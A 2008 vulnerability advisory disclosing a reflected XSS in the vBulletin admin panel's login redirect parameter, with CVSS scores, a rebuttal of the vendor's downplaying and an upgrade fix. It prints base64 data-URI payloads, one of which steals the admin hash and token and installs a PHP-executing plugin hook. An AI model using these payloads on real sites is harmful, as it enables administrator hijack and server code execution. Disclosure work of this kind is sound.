Exploit for vBulletin "obscure" XSS (3.7.1 & 3.6.10)

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

====================================================================== Advisory : Exploit for vBulletin "obscure" XSS Release Date : June 13th 2008 Application : vBulletin Version : vBulletin 3.7.1 and lower, vBulletin 3.6.10 and lower Platform : PHP Vendor URL : http://www.vbulletin.com/ Authors : Jessica Hope (jessicasaulhope (at) googlemail (dot) com [email concealed]) ======================================================================= Overview Due to various failures in sanitising user input, it is possible to construct XSS attacks that are rather damaging. ======================================================================= Discussion vBulletin released PL1 for their 3.7.1 and 3.6.10 versions of vBulletin: http://www.vbulletin.com/forum/showthread.php?t=274882 In the above topic they try to pass off the XSS as difficult to exploit, with low exposure and damage. This advisory is here to detail what the XSS is and how wrong Jelsoft are for assuming that XSS is harmless. First, the discussion of exactly what the exploit is. The XSS in question exists on the login page for the ACP (admin control panel). The login script takes a redirect parameter that lacks sanitation, allowing a rather easy XSS: http://localhost/vB3/admincp/index.php?redirect={XSS} Yes, here goes the obscure. What is even better is that the exploit will work outright if the admin is already logged in; if the admin is not, they will be required to log in. If you Base64-encode your attack vector using the data: URI scheme, the XSS survives the login request and activates after the admin is logged in. A simple example of the above: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64,PH NjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K Now to address the quote "potential for exposure and damage is limited". Clearly Jelsoft have never seen what one can do with an XSS. In this case you have an unlimited and unaltered XSS space, so you're free to invoke some AJAX and have fun. Just to give ideas on how this could turn into something larger, vBulletin has hooks that operate using eval(), and new hooks can be added via the ACP itself. It is trivial to write some JS that not only enables hooks but also inserts a nice RFI hook. Here's one using the data URI: data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3 JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz 0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3 N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW 5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdX Bsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW 5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKH IuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va2 5hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZX I9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cF JlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZX IoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD 0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2 RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3RvO3IyPSBuZXcgWE1MSH R0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZG VyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Ii k8L3NjcmlwdD4K The above will survive a login prompt. It will then, once executed, proceed to parse one of the ACP pages and extract the admin hash and token, then it will enable hooks and add one that executes phpinfo(). In order to exploit, just get an admin to click the link. It's easier than Jelsoft would expect... ======================================================================= Solution Per usual, update to 3.7.1 PL1 or 3.6.10 PL1 For the vendor, however, the solution to such things in the future is to never call an exploit obscure, and never write "the potential for exposure and damage is limited" when talking about an XSS. Above all, give credit where credit is due, for there's no quicker way to piss someone off than to not give credit. If the above was due to your PR department, then ignore them next time, for handling exploits with PR is never a good idea. =======================================================================



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